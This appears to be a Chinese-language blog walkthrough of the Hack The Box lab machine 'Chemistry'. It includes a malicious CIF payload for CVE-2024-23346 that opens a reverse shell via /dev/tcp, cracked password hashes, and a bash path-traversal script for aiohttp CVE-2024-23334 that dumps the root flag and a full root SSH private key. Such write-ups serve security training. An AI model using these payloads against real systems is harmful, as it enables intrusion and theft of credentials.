跳至主要內容

Chemistry Writeup

H@yn3$2025年3月5日...大约 6 分钟CTFHTBMachine

拿到 Machine 的 IP 是 10.10.11.38 首先是扫描端口,查看开放端口

$ fscan -h 10.10.11.38 -p all
┌──────────────────────────────────────────────┐
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-05 12:34:20] [INFO] 暴力破解线程数: 1
[2025-03-05 12:34:20] [INFO] 开始信息扫描
[2025-03-05 12:34:20] [INFO] 最终有效主机数量: 1
[2025-03-05 12:34:20] [INFO] 开始主机扫描
[2025-03-05 12:34:20] [INFO] 有效端口数量: 65535
[2025-03-05 12:34:20] [SUCCESS] 端口开放 10.10.11.38:22
[2025-03-05 12:34:20] [SUCCESS] 服务识别 10.10.11.38:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.11 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11.]
[2025-03-05 12:34:45] [SUCCESS] 端口开放 10.10.11.38:5000
[2025-03-05 12:34:50] [SUCCESS] 服务识别 10.10.11.38:5000 =>
[2025-03-05 12:39:27] [INFO] 存活端口数量: 2
[2025-03-05 12:39:28] [INFO] 开始漏洞扫描
[2025-03-05 12:39:28] [INFO] 加载的插件: ssh
[2025-03-05 12:39:28] [SUCCESS] 扫描已完成: 1/1

发现 5000 端口有一个网站,注册后可以看到一个上传文件的界面

5000 端口网页
5000 端口网页

从描述中可以看到,文件只能上传 .CIF 格式,同时提供了一个示例文件

通过搜索引擎可以找到 CVE-2024-23346 的漏洞,可以通过上传恶意 .CIF 文件来执行命令

下载项目中的 POC,尝试反弹 Shell

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/<IP>/<PORT> 0>&1\'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

上传执行后成功反弹 Shell,查看 /etc/passwd 文件

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

查看网站目录,看到 database.db

reverse shell
reverse shell

下载数据库文件,使用 sqlite3 工具查看

$ sqlite3 database.db
SQLite version 3.45.3 2024-04-15 13:34:05
Enter ".help" for usage hints.
sqlite> .tables
structure  user
sqlite> select * from user;
1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|hacker|d6a6bc0db10694a2d90e3a69648f3a03
16|111|202cb962ac59075b964b07152d234b70

看到 rosa 的密码,使用 hashcat 工具破解

$ hashcat "63ed86ee9f624c7b14f1d4f43dc251a5" -m 0 -a 0 ./rockyou.txt
...
63ed86ee9f624c7b14f1d4f43dc251a5:unicorniosrosados

使用 rosa 用户登录 SSH,拿到 user.txt

rosa@chemistry:~$ cat user.txt
45a1434fecffa90dc3bc6fce2cd5a519

使用 fscan 扫描本地端口

rosa@chemistry:~$ ./fscan -h 127.0.0.1 -p all
┌──────────────────────────────────────────────┐
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-05 06:28:10] [INFO] 暴力破解线程数: 1
[2025-03-05 06:28:10] [INFO] 开始信息扫描
[2025-03-05 06:28:10] [INFO] 最终有效主机数量: 1
[2025-03-05 06:28:10] [INFO] 开始主机扫描
[2025-03-05 06:28:10] [INFO] 有效端口数量: 65535
[2025-03-05 06:28:10] [SUCCESS] 端口开放 127.0.0.1:22
[2025-03-05 06:28:10] [SUCCESS] 服务识别 127.0.0.1:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.11 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11.]
[2025-03-05 06:28:10] [SUCCESS] 端口开放 127.0.0.1:5000
[2025-03-05 06:28:11] [SUCCESS] 端口开放 127.0.0.1:8080
[2025-03-05 06:28:16] [SUCCESS] 服务识别 127.0.0.1:5000 =>
[2025-03-05 06:28:17] [SUCCESS] 服务识别 127.0.0.1:8080 => [http]
[2025-03-05 06:28:20] [INFO] 存活端口数量: 3
[2025-03-05 06:28:20] [INFO] 开始漏洞扫描
[2025-03-05 06:28:20] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-05 06:28:20] [SUCCESS] 网站标题 http://127.0.0.1:8080     状态码:200 长度:5971   标题:Site Monitoring

发现还有一个 web 服务在端口 8080 没有暴露在公网上

使用 gost 把 8080 端口转发到 2080 端口

rosa@chemistry:~$ ./gost -L tcp://:2080/127.0.0.1:8080
{"handler":"tcp","kind":"service","level":"info","listener":"tcp","msg":"listening on [::]:2080/tcp","service":"service-0","time":"2025-03-05T06:33:13.897Z"}
Site Monitoring
Site Monitoring

使用 curl 查看网站服务

$ curl -v 10.10.11.38:2080
*   Trying 10.10.11.38:2080...
* Connected to 10.10.11.38 (10.10.11.38) port 2080
> GET / HTTP/1.1
> Host: 10.10.11.38:2080
> User-Agent: curl/8.7.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 5971
< Date: Wed, 05 Mar 2025 06:34:16 GMT
< Server: Python/3.9 aiohttp/3.9.1

搜索到 Python/3.9 aiohttp/3.9.1 存在路径遍历漏洞 CVE-2024-23334,且符合版本 Aiohttp =< 3.9.1

下载 POC,修改参数,这里的静态文件路径是 /assets/

#!/bin/bash

url="http://10.10.11.38:2080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"

    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done

执行 POC,获取 root.txt

$ bash poc.sh
[+] Testing with /assets/../root/root.txt
	Status code --> 404
[+] Testing with /assets/../../root/root.txt
	Status code --> 404
[+] Testing with /assets/../../../root/root.txt
	Status code --> 200
158445368c21e502698c7bba3dac50fb

成功拿到 root.txt

如果要登录 root 用户,可以使用 POC 获取 /root/.ssh/id_rsa 私钥,使用私钥登录 SSH

$ bash poc.sh
[+] Testing with /assets/../root/.ssh/id_rsa
	Status code --> 404
[+] Testing with /assets/../../root/.ssh/id_rsa
	Status code --> 404
[+] Testing with /assets/../../../root/.ssh/id_rsa
	Status code --> 200
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

使用私钥登录 root 用户

$ ssh -i root_rsa root@10.10.11.38
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed 05 Mar 2025 06:46:07 AM UTC

  System load:           0.0
  Usage of /:            81.8% of 5.08GB
  Memory usage:          32%
  Swap usage:            0%
  Processes:             253
  Users logged in:       2
  IPv4 address for eth0: 10.10.11.38
  IPv6 address for eth0: dead:beef::250:56ff:feb9:d92f


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Mar  5 04:46:52 2025 from 10.10.16.17
root@chemistry:~# id
uid=0(root) gid=0(root) groups=0(root)
上次编辑于: 2025/3/11 00:05:04
贡献者: HaynesChennn
0  字
评论
  • 按正序
  • 按倒序
  • 按热度
Powered by Waline v3.3.1
Made with ❤️ by Haynes.
MIT